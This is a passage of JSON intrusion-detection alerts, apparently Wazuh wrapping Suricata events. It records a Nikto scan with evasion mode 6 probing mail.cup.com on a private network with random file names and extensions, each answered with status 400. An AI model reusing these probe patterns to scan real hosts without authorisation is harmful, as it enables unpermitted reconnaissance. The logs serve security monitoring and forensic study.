(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.406521+0000","flow_id":"2137592322207186.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46988","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.AP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.408739+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":27,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.46049","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.408739+0000\",\"flow_id\":491335652620395,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46990,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp-1251\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.408739+0000","flow_id":"491335652620395.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46990","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp-1251","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.411490+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":28,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.47593","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.411490+0000\",\"flow_id\":418346978395032,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46992,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.blt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.411490+0000","flow_id":"418346978395032.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46992","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.blt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.414228+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":29,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.49129","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.414228+0000\",\"flow_id\":984986308726290,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46994,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/.bISn4adA\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.414228+0000","flow_id":"984986308726290.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46994","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/.bISn4adA","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.416379+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":30,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.50659","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.416379+0000\",\"flow_id\":1450801281783779,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46996,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.show_query_columns\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.416379+0000","flow_id":"1450801281783779.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46996","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.show_query_columns","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.418630+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":31,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.52227","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.418630+0000\",\"flow_id\":391417533456539,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46998,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dtd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.418630+0000","flow_id":"391417533456539.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46998","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dtd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.429055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":32,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.53763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.429055+0000\",\"flow_id\":1722213150132363,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47002,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.429055+0000","flow_id":"1722213150132363.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47002","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.420714+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":33,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.55301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.420714+0000\",\"flow_id\":1.80732651702906e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47000,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.shtm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.420714+0000","flow_id":"1807326517029060.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47000","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.shtm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.434021+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":34,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.56845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.434021+0000\",\"flow_id\":243292701366920,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47004,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.it\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.434021+0000","flow_id":"243292701366920.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47004","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.it","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.439682+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":35,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.58379","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.439682+0000\",\"flow_id\":1495318617829748,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47006,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.INC\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.439682+0000","flow_id":"1495318617829748.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47006","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.INC","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.445037+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":36,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.59917","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.445037+0000\",\"flow_id\":429677102155680,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47008,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.445037+0000","flow_id":"429677102155680.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47008","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.449313+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":37,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.61453","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.449313+0000\",\"flow_id\":324562072555718,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47010,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htaccess\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.449313+0000","flow_id":"324562072555718.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47010","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htaccess","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.452773+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":38,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.62999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.452773+0000\",\"flow_id\":1849172383425421,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47012,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.notes\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.452773+0000","flow_id":"1849172383425421.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47012","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.notes","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.455975+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":39,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.64541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.455975+0000\",\"flow_id\":2160789440622614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47014,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.455975+0000","flow_id":"2160789440622614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47014","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.459533+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":40,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.66073","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.459533+0000\",\"flow_id\":124820323499370,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47016,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.snp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.459533+0000","flow_id":"124820323499370.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47016","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.snp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.462827+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":41,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.67609","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.462827+0000\",\"flow_id\":67126027750670,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47018,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.462827+0000","flow_id":"67126027750670.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47018","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.465956+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 